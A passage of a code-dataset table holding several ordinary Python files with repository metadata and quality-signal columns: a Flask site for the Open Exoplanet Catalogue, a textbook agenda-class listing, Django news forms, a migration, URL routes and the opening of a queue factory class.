hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
05ae01aac492c81e8d3573584782d2cd17b9fff0 | 16,671 | py | Python | oec_web.py | OpenExoplanetCatalogue/oec_web | aa889d2544ad9e4203ea0a9cb4a8033684ce1512 | [
"MIT",
"Unlicense"
] | 19 | 2015-02-07T14:01:16.000Z | 2021-11-12T23:41:20.000Z | oec_web.py | OpenExoplanetCatalogue/oec_web | aa889d2544ad9e4203ea0a9cb4a8033684ce1512 | [
"MIT",
"Unlicense"
] | 14 | 2015-01-29T23:23:07.000Z | 2021-01-08T00:59:00.000Z | oec_web.py | OpenExoplanetCatalogue/oec_web | aa889d2544ad9e4203ea0a9cb4a8033684ce1512 | [
"MIT",
"Unlicense"
] | 17 | 2015-04-28T03:23:08.000Z | 2022-02-22T07:19:33.000Z | #import xml.etree.ElementTree as ET
import lxml.etree as ET
import glob
import os
import time
import urllib
import difflib
import copy
import json
import visualizations
import oec_filters
import datetime
import oec_fields
from bson.objectid import ObjectId
from functools import wraps
#import oec_plots
from numberformat import renderFloat, renderText, notAvailableString
from flask import Flask, abort, render_template, send_from_directory, request, redirect, Response, make_response
#from flask.ext.pymongo import PyMongo
import threading
APP_ROOT = os.path.dirname(os.path.abspath(__file__))
with open(APP_ROOT+"/recaptcha.txt") as f: # read in secret from file.
content = f.readlines()
captchasecret = "".join(content).strip()
with open(APP_ROOT+"/adminpassword.txt") as f: # read in secret from file.
content = f.readlines()
adminpassword = "".join(content).strip()
class MyOEC:
OEC_PATH = APP_ROOT+"/open_exoplanet_catalogue/"
OEC_META_PATH = APP_ROOT+"/oec_meta/"
def __init__(self):
print "Parsing OEC ..."
self.fullxml = "<systems>\n"
self.planets = []
self.systems = []
self.planetXmlPairs = {}
self.planetnames = {}
# Loop over all files and create new data
for filename in glob.glob(self.OEC_PATH + "systems/*.xml"):
# Open file
f = open(filename, 'rt')
xml = f.read()
f.close()
self.fullxml+=xml
filename = filename[len(self.OEC_PATH):]
# Try to parse file
root = ET.fromstring(xml)
self.systems.append(root)
pstars = root.findall("./star")
for p in root.findall(".//planet"):
star = None
parent = p.getparent()
if parent.tag=="star":
star = parent
xmlPair = (root,p,star,filename)
self.planets.append(xmlPair)
name = p.find("./name").text
self.planetXmlPairs[name] = xmlPair
for n in p.findall("./name"):
self.planetnames[n.text] = name
self.fullxml += "</systems>\n"
print "Parsing OEC META ..."
with open(self.OEC_META_PATH+"statistics.xml", 'rt') as f:
self.oec_meta_statistics = ET.parse(f).getroot()
print "Parsing done."
class FlaskApp(Flask):
def __init__(self, *args, **kwargs):
super(FlaskApp, self).__init__(*args, **kwargs)
self.oec = self.getOEC()
def getOEC(self):
mydata = threading.local()
if not hasattr(mydata, "oec"):
mydata.oec = MyOEC()
return mydata.oec
app = FlaskApp(__name__)
#try:
# mongo = PyMongo(app)
#except:
# print("Mongo DB not correctly initialized.")
mongo = None
def isList(value):
return isinstance(value, list)
def getFirst(value):
if isList(value):
return value[0]
return value
app.jinja_env.filters['islist'] = isList
app.jinja_env.filters['getFirst'] = getFirst
#################
@app.route('/system.html')
@app.route('/search/')
def page_planet_redirect():
oec = app.oec
planetname = request.args.get("id")
if planetname not in oec.planetXmlPairs:
if planetname in oec.planetnames:
planetname = oec.planetnames[planetname]
else:
abort(404)
return redirect("planet/"+planetname, 301)
#################
def check_auth(username, password):
"""This function is called to check if a username /
password combination is valid.
"""
return username == 'admin' and password == adminpassword
def authenticate():
"""Sends a 401 response that enables basic auth"""
return Response(
'Could not verify your access level for that URL.\n'
'You have to login with proper credentials', 401,
{'WWW-Authenticate': 'Basic realm="Login Required"'})
def requires_auth(f):
@wraps(f)
def decorated(*args, **kwargs):
auth = request.authorization
if not auth or not check_auth(auth.username, auth.password):
return authenticate()
return f(*args, **kwargs)
return decorated
@app.route('/plot/<plotname>/')
@app.route('/plot/<plotname>')
@app.route('/plot/<plotname>.svg')
def page_plot(plotname):
# oec = app.oec
# if plotname=="discoveryyear":
# return Response(oec_plots.discoveryyear(oec.oec_meta_statistics), mimetype='image/svg+xml')
# if plotname=="skypositions":
# return Response(oec_plots.skypositions(oec.systems), mimetype='image/svg+xml')
abort(404)
@app.route('/')
@app.route('/index.html')
def page_main():
oec = app.oec
contributors = []
for c in oec.oec_meta_statistics.findall(".//contributor"):
contributors.append(c.text)
commitdate = datetime.datetime.fromtimestamp(int(oec.oec_meta_statistics.find(".//lastcommittimestamp").text))
return render_template("index.html",
numplanets=len(oec.planets),
numsystems=int(oec.oec_meta_statistics.find("./systems").text),
numconfirmedplanets=int(oec.oec_meta_statistics.find("./confirmedplanets").text),
numbinaries=int(oec.oec_meta_statistics.find("./binaries").text),
lastupdate=commitdate.strftime("%c"),
numcommits=int(oec.oec_meta_statistics.find("./commits").text),
contributors=contributors,
)
@app.route('/kiosk/')
def page_kiosk():
oec = app.oec
commitdate = datetime.datetime.fromtimestamp(int(oec.oec_meta_statistics.find(".//lastcommittimestamp").text))
data_x = ""
data_y = ""
sum_y = 0
for y in oec.oec_meta_statistics.find("./discoveryyear"):
data_x += y.tag[1:] + ","
sum_y+=int(y.text)
data_y += "%d," % sum_y
return render_template("kiosk.html",
numconfirmedplanets=int(oec.oec_meta_statistics.find("./confirmedplanets").text),
lastupdate=commitdate.strftime("%A, %-d %B %Y, %X"),
loaddate=time.strftime("%A, %-d %B %Y, %X"),
discoverynumbers= data_y[:-1],
discoveryyears= data_x[:-1],
)
@app.route('/systems/',methods=["POST","GET"])
def page_systems():
oec = app.oec
p = []
debugtxt = ""
fields = ["namelink"]
filters = []
if "filters" in request.args:
listfilters = request.args.getlist("filters")
for filter in listfilters:
if filter in oec_filters.titles:
filters.append(filter)
if "fields" in request.args:
listfields = request.args.getlist("fields")
for field in listfields:
if field in oec_fields.titles and field!="namelink":
fields.append(field)
else:
fields += ["mass","radius","massEarth","radiusEarth","numberofplanets","numberofstars"]
lastfilename = ""
tablecolour = 0
for xmlPair in oec.planets:
if oec_filters.isFiltered(xmlPair,filters):
continue
system,planet,star,filename = xmlPair
if lastfilename!=filename:
lastfilename = filename
tablecolour = not tablecolour
d = {}
d["fields"] = [tablecolour]
for field in fields:
d["fields"].append(oec_fields.render(xmlPair,field,editbutton=False))
p.append(d)
return render_template("systems.html",
columns=[oec_fields.titles[field] for field in fields],
planets=p,
available_fields=oec_fields.titles,
available_filters=oec_filters.titles,
fields=fields,
filters=filters,
debugtxt=debugtxt)
@app.route('/webgl.html')
def page_webgl():
return render_template("webgl.html")
@app.route('/planet/<planetname>')
@app.route('/planet/<planetname>/')
@app.route('/system/<planetname>/')
def page_planet(planetname):
oec = app.oec
try:
xmlPair = oec.planetXmlPairs[planetname]
except:
abort(404)
system,planet,star,filename = xmlPair
planets=system.findall(".//planet")
stars=system.findall(".//star")
systemtable = []
for row in ["systemname","systemalternativenames","rightascension","declination","distance","distancelightyears","numberofstars","numberofplanets"]:
systemtable.append((oec_fields.titles[row],oec_fields.render(xmlPair,row)))
planettable = []
planettablefields = []
for row in ["name","alternativenames","description","lists","mass","massEarth","radius","radiusEarth","period","semimajoraxis","eccentricity","temperature","discoverymethod","discoveryyear","lastupdate"]:
planettablefields.append(oec_fields.titles[row])
rowdata = []
for p in planets:
rowdata.append(oec_fields.render((system,p,star,filename),row))
if len(set(rowdata)) <= 1 and row!="name" and rowdata[0]!=notAvailableString: # all fields identical:
rowdata = rowdata[0]
planettable.append(rowdata)
startable = []
startablefields = []
for row in ["starname","staralternativenames","starmass","starradius","starage","starmetallicity","startemperature","starspectraltype","starmagV"]:
startablefields.append(oec_fields.titles[row])
rowdata = []
if len(stars)>0: # free floating planets
for s in stars:
rowdata.append(oec_fields.render((system,planet,s,filename),row))
if len(set(rowdata)) <= 1 and row!="starname" and rowdata[0]!=notAvailableString: # all fields identical:
rowdata = rowdata[0]
startable.append(rowdata)
references = []
contributors = []
try:
with open(oec.OEC_META_PATH+filename, 'rt') as f:
root = ET.parse(f).getroot()
for l in root.findall(".//link"):
references.append(l.text)
for c in root.findall(".//contributor"):
contributors.append((c.attrib["commits"],c.attrib["email"],c.text))
except IOError:
pass
vizsize = visualizations.size(xmlPair)
vizhabitable = visualizations.habitable(xmlPair)
vizarchitecture = visualizations.textArchitecture(system)
return render_template("planet.html",
system=system,
planet=planet,
filename=filename,
planetname=planetname,
vizsize=vizsize,
vizhabitable=vizhabitable,
architecture=vizarchitecture,
systemname=oec_fields.render(xmlPair,"systemname"),
systemtable=systemtable,
image=(oec_fields.render(xmlPair,"image"),oec_fields.render(xmlPair,"imagedescription")),
planettablefields=planettablefields,
planettable=planettable,
startablefields=startablefields,
startable=startable,
references=references,
contributors=contributors,
systemcategory=oec_fields.render(xmlPair,"systemcategory"),
)
def getAttribText(o,a):
if a in o.attrib:
return o.attrib[a]
else:
return ""
# form disabled
#@app.route('/edit/form/<path:fullpath>')
def page_planet_edit_form(fullpath):
path = fullpath.split(".xml/")
if len(path)!=2:
abort(404)
urlfilename = path[0]+".xml"
xmlpath = path[1]
oec = app.oec
for key in oec.planetXmlPairs:
system,planet,star,filename = oec.planetXmlPairs[key]
if filename==urlfilename:
break
if filename!=urlfilename:
abort(404)
planetname = planet.find("./name").text
o = system.find(xmlpath)
title = ""
tag = o.tag
if o.getparent().tag == "star":
tag = "star"+tag
if tag in oec_fields.titles:
title = oec_fields.titles[tag]
if tag in ["description"]:
# Text
return render_template("edit_form_text.html",
title=title,
value=o.text,
filename=filename,
xmlpath=xmlpath,
)
# Default float
return render_template("edit_form_float.html",
title=title,
value=o.text,
filename=filename,
errorminus=getAttribText(o,"errorminus"),
errorplus=getAttribText(o,"errorplus"),
lowerlimit=getAttribText(o,"lowerlimit"),
upperlimit=getAttribText(o,"upperlimit"),
xmlpath=xmlpath,
)
# Nicely indents the XML output
def indent(elem, level=0):
i = "\n" + level * "\t"
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + "\t"
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
indent(elem, level + 1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
# form disabled
#@app.route('/edit/submit/<path:fullpath>',methods=["POST"])
def page_planet_edit_submit(fullpath):
path = fullpath.split(".xml/")
if len(path)!=2:
abort(404)
urlfilename = path[0]+".xml"
xmlpath = path[1]
if "g-recaptcha-response" not in request.form:
return json.dumps({'success': False, 'message': "Captcha failed. Please try again."})
url = "https://www.google.com/recaptcha/api/siteverify?secret="+captchasecret+"&response="+request.form["g-recaptcha-response"]+""
captcharesponse = json.load(urllib.urlopen(url))
if captcharesponse["success"]!=True:
return json.dumps({'success': False, 'message': "Captcha failed. Please try again."})
if len(request.form["name"])<2:
return json.dumps({'success': False, 'message': "Please enter your name."})
if len(request.form["paper"])<10:
return json.dumps({'success': False, 'message': "Please enter a valid link to a scientific publication."})
oec = app.oec
for key in oec.planetXmlPairs:
system,planet,star,filename = oec.planetXmlPairs[key]
if filename==urlfilename:
break
if filename!=urlfilename:
return json.dumps({'success': False, 'message': "Cannot find system."})
new_system = copy.deepcopy(system)
o = new_system.find(xmlpath)
tag = o.tag
if o.getparent().tag == "star":
tag = "star"+tag
if tag in ["desription"]:
# Text
if "value" in request.form:
o.text = request.form["value"]
else:
# Float
attribs = ["errorplus", "errorminus","upperlimit", "lowerlimit"]
for attrib in attribs:
if attrib in request.form:
newv = request.form[attrib]
if len(newv)==0:
if attrib in o.attrib:
o.attrib.pop(attrib)
else:
o.attrib[attrib] = newv
if "value" in request.form:
o.text = request.form["value"]
indent(new_system)
diff = difflib.unified_diff(
ET.tostring(system, encoding="UTF-8", xml_declaration=False).strip().split("\n"),
ET.tostring(new_system, encoding="UTF-8", xml_declaration=False).strip().split("\n"),
fromfile=filename,
tofile=filename,
lineterm='')
# Just for testing. Needs a proper backend.
d = {}
d["patch"] = '\n'.join(diff)
d["paper"] = request.form["paper"]
d["name"] = request.form["name"]
d["ip"] = request.remote_addr
d["date"] = time.time()
mongo.db.edits.insert(d)
return json.dumps({'success': True, 'message': "Thanks for your contribution. We're checking your commit now."})
@app.route('/correlations/')
@app.route('/correlations.html')
def page_correlations():
return render_template("correlations.html")
@app.route('/histogram/')
@app.route('/histogram.html')
def page_histogram():
return render_template("histogram.html",)
@app.route('/systems.xml')
def page_systems_xml():
oec = app.oec
return oec.fullxml
@app.route('/robots.txt')
def page_robots_txt():
return "User-agent: *\nDisallow:\n"
@app.route('/edits/',methods=["POST","GET"])
@requires_auth
def page_edits():
if "approve" in request.form:
edit = mongo.db.edits.find_one( {"_id": ObjectId(request.form["approve"])} )
response = make_response(edit["patch"])
response.headers["Content-Disposition"] = "attachment; filename=oec.patch"
response.headers["Content-Type"] = "application/patch"
return response
else:
if "delete" in request.form:
print mongo.db.edits.remove( {"_id": ObjectId(request.form["delete"])} )
edits = mongo.db.edits.find()
return render_template("edits.html",
edits=edits,
)
if __name__ == '__main__':
app.run(debug=True,threaded=True)
| 33.408818 | 208 | 0.619399 | 1,912 | 16,671 | 5.317469 | 0.208682 | 0.017311 | 0.018393 | 0.019671 | 0.23773 | 0.201731 | 0.169568 | 0.169568 | 0.146946 | 0.127471 | 0 | 0.004268 | 0.241017 | 16,671 | 498 | 209 | 33.475904 | 0.799257 | 0.051407 | 0 | 0.209877 | 0 | 0 | 0.148917 | 0.008586 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.014815 | 0.041975 | null | null | 0.009877 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05afbc147cbff79e1f9b44cd06a8934031b41d20 | 2,339 | py | Python | IntroProPython/listagem/capitulo 11/11.29 - Novas classes - listagem parcial.py | SweydAbdul/estudos-python | b052708d0566a0afb9a1c04d035467d45f820879 | [
"MIT"
] | null | null | null | IntroProPython/listagem/capitulo 11/11.29 - Novas classes - listagem parcial.py | SweydAbdul/estudos-python | b052708d0566a0afb9a1c04d035467d45f820879 | [
"MIT"
] | null | null | null | IntroProPython/listagem/capitulo 11/11.29 - Novas classes - listagem parcial.py | SweydAbdul/estudos-python | b052708d0566a0afb9a1c04d035467d45f820879 | [
"MIT"
] | null | null | null | ##############################################################################
# Parte do livro Introdução à Programação com Python
# Autor: Nilo Ney Coutinho Menezes
# Editora Novatec (c) 2010-2017
# Primeira edição - Novembro/2010 - ISBN 978-85-7522-250-8
# Primeira reimpressão - Outubro/2011
# Segunda reimpressão - Novembro/2012
# Terceira reimpressão - Agosto/2013
# Segunda edição - Junho/2014 - ISBN 978-85-7522-408-3
# Primeira reimpressão - Segunda edição - Maio/2015
# Segunda reimpressão - Segunda edição - Janeiro/2016
# Terceira reimpressão - Segunda edição - Junho/2016
# Quarta reimpressão - Segunda edição - Março/2017
#
# Site: http://python.nilo.pro.br/
#
# Arquivo: listagem\capitulo 11\11.29 - Novas classes - listagem parcial.py
##############################################################################
class DBListaÚnica(ListaÚnica):
def __init__(self, elem_class):
super().__init__(elem_class)
self.apagados = []
def remove(self, elem):
if elem.id is not None:
self.apagados.append(elem.id)
super().remove(elem)
def limpa(self):
self.apagados = []
class DBNome(Nome):
def __init__(self, nome, id_=None):
super().__init__(nome)
self.id = id_
class DBTipoTelefone(TipoTelefone):
def __init__(self, id_, tipo):
super().__init__(tipo)
self.id = id_
class DBTelefone(Telefone):
def __init__(self, número, tipo=None, id_=None, id_nome=None):
super().__init__(número, tipo)
self.id = id_
self.id_nome = id_nome
class DBTelefones(DBListaÚnica):
def __init__(self):
super().__init__(DBTelefone)
class DBTiposTelefone(ListaÚnica):
def __init__(self):
super().__init__(DBTipoTelefone)
class DBDadoAgenda:
def __init__(self, nome):
self.nome = nome
self.telefones = DBTelefones()
@property
def nome(self):
return self.__nome
@nome.setter
def nome(self, valor):
if type(valor)!=DBNome:
raise TypeError("nome deve ser uma instância da classe DBNome")
self.__nome = valor
def pesquisaTelefone(self, telefone):
posição = self.telefones.pesquisa(DBTelefone(telefone))
if posição == -1:
return None
else:
return self.telefones[posição]
| 29.987179 | 78 | 0.614793 | 263 | 2,339 | 5.212928 | 0.39924 | 0.03574 | 0.056163 | 0.018964 | 0.029176 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042123 | 0.218469 | 2,339 | 77 | 79 | 30.376623 | 0.707877 | 0.273194 | 0 | 0.148936 | 0 | 0 | 0.028815 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.255319 | false | 0 | 0 | 0.021277 | 0.468085 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05b54bb3fe5dc682880a95d84c390e21f038de58 | 2,040 | py | Python | byceps/blueprints/admin/news/forms.py | GSH-LAN/byceps | ab8918634e90aaa8574bd1bb85627759cef122fe | [
"BSD-3-Clause"
] | 33 | 2018-01-16T02:04:51.000Z | 2022-03-22T22:57:29.000Z | byceps/blueprints/admin/news/forms.py | GSH-LAN/byceps | ab8918634e90aaa8574bd1bb85627759cef122fe | [
"BSD-3-Clause"
] | 7 | 2019-06-16T22:02:03.000Z | 2021-10-02T13:45:31.000Z | byceps/blueprints/admin/news/forms.py | GSH-LAN/byceps | ab8918634e90aaa8574bd1bb85627759cef122fe | [
"BSD-3-Clause"
] | 14 | 2019-06-01T21:39:24.000Z | 2022-03-14T17:56:43.000Z | """
byceps.blueprints.admin.news.forms
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2006-2021 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
import re
from flask_babel import lazy_gettext
from wtforms import FileField, StringField, TextAreaField
from wtforms.fields.html5 import DateField, TimeField
from wtforms.validators import InputRequired, Length, Optional, Regexp
from ....util.l10n import LocalizedForm
SLUG_REGEX = re.compile('^[a-z0-9-]+$')
class ChannelCreateForm(LocalizedForm):
channel_id = StringField(
lazy_gettext('ID'), validators=[InputRequired(), Length(min=1, max=40)]
)
url_prefix = StringField(
lazy_gettext('URL prefix'), [InputRequired(), Length(max=80)]
)
class _ImageFormBase(LocalizedForm):
alt_text = StringField(lazy_gettext('Alternative text'), [InputRequired()])
caption = StringField(lazy_gettext('Caption'), [Optional()])
attribution = StringField(lazy_gettext('Source'), [Optional()])
class ImageCreateForm(_ImageFormBase):
image = FileField(lazy_gettext('Image file'), [InputRequired()])
class ImageUpdateForm(_ImageFormBase):
pass
class ItemCreateForm(LocalizedForm):
slug = StringField(
lazy_gettext('Slug'),
[
InputRequired(),
Length(max=100),
Regexp(
SLUG_REGEX,
message=lazy_gettext(
'Lowercase letters, digits, and dash are allowed.'
),
),
],
)
title = StringField(
lazy_gettext('Title'), [InputRequired(), Length(max=100)]
)
body = TextAreaField(lazy_gettext('Text'), [InputRequired()])
image_url_path = StringField(
lazy_gettext('Image URL path'), [Optional(), Length(max=100)]
)
class ItemUpdateForm(ItemCreateForm):
pass
class ItemPublishLaterForm(LocalizedForm):
publish_on = DateField(lazy_gettext('Date'), [InputRequired()])
publish_at = TimeField(lazy_gettext('Time'), [InputRequired()])
| 27.2 | 79 | 0.657843 | 197 | 2,040 | 6.675127 | 0.446701 | 0.11711 | 0.13384 | 0.038023 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016605 | 0.202941 | 2,040 | 74 | 80 | 27.567568 | 0.792128 | 0.082353 | 0 | 0.083333 | 0 | 0 | 0.078326 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.041667 | 0.125 | 0 | 0.520833 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
05b96ce631c9290e2b36676226eaef02df761e51 | 824 | py | Python | arcfire/arcfire/migrations/0002_auto_20151112_0336.py | allanberry/arcfire | c41bad3ae7792406e169f9f7acd02f7e52467cbe | [
"MIT"
] | null | null | null | arcfire/arcfire/migrations/0002_auto_20151112_0336.py | allanberry/arcfire | c41bad3ae7792406e169f9f7acd02f7e52467cbe | [
"MIT"
] | 38 | 2015-10-21T19:10:36.000Z | 2015-12-18T11:57:12.000Z | arcfire/arcfire/migrations/0002_auto_20151112_0336.py | allanberry/arcfire | c41bad3ae7792406e169f9f7acd02f7e52467cbe | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9b1 on 2015-11-12 03:36
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('arcfire', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='place',
name='location',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='places_primary', to='arcfire.Location'),
),
migrations.AlterField(
model_name='person',
name='gender',
field=models.CharField(blank=True, choices=[('f', 'Female'), ('m', 'Male'), ('none', 'None'), ('other', 'Other')], max_length=10),
),
]
| 30.518519 | 158 | 0.612864 | 91 | 824 | 5.417582 | 0.659341 | 0.048682 | 0.056795 | 0.089249 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03481 | 0.23301 | 824 | 26 | 159 | 31.692308 | 0.745253 | 0.081311 | 0 | 0.105263 | 1 | 0 | 0.137931 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.157895 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05b9dda30fd0fb12c0f19ff7b3c4cc0f6dac7be0 | 630 | py | Python | LHBackEnd/userprofile/urls.py | minhthong582000/LH-back-end | 7555575a5e096d1502074fa2f743f1c1b4568543 | [
"Apache-2.0"
] | null | null | null | LHBackEnd/userprofile/urls.py | minhthong582000/LH-back-end | 7555575a5e096d1502074fa2f743f1c1b4568543 | [
"Apache-2.0"
] | null | null | null | LHBackEnd/userprofile/urls.py | minhthong582000/LH-back-end | 7555575a5e096d1502074fa2f743f1c1b4568543 | [
"Apache-2.0"
] | null | null | null | from django.urls import path
from django.conf.urls import url
from . import views
from django.views.generic.base import RedirectView
from rest_framework.urlpatterns import format_suffix_patterns
app_name = 'userprofile'
urlpatterns = [
path('profile/<int:pk>/', views.OtherUserDetail.as_view()), #includes favorites, and friends' recipes for the feed
path('profile/<int:pk>/favorites/', views.UserFavoriteList.as_view()),
path('profile/<int:pk>/friends/', views. UserFriendsList.as_view()),
path('profile/search/<str:query>/', views. UserSearchList.as_view())
]
urlpatterns = format_suffix_patterns(urlpatterns) | 39.375 | 118 | 0.765079 | 81 | 630 | 5.82716 | 0.493827 | 0.09322 | 0.088983 | 0.101695 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104762 | 630 | 16 | 119 | 39.375 | 0.836879 | 0.084127 | 0 | 0 | 0 | 0 | 0.185442 | 0.136915 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.384615 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
05bbade2f2ec37295e10e5d0ed3d9a8803d32394 | 693 | py | Python | bbpyp/common/model/queue_factory.py | BloggerBust/bbpyp | 078f940dd38bc3ee7c5adcfb2555c2843a4ca57b | [
"Apache-2.0"
] | null | null | null | bbpyp/common/model/queue_factory.py | BloggerBust/bbpyp | 078f940dd38bc3ee7c5adcfb2555c2843a4ca57b | [
"Apache-2.0"
] | null | null | null | bbpyp/common/model/queue_factory.py | BloggerBust/bbpyp | 078f940dd38bc3ee7c5adcfb2555c2843a4ca57b | [
"Apache-2.0"
] | null | null | null | from bbpyp.common.exception.bbpyp_value_error import BbpypValueError
from bbpyp.common.model.queue_type import QueueType
class QueueFactory:
    """Callable factory: builds a queue of the requested QueueType."""

    def __init__(self, fifo_queue_factory, sequence_queue_factory):
        # One zero-argument factory callable per supported queue type.
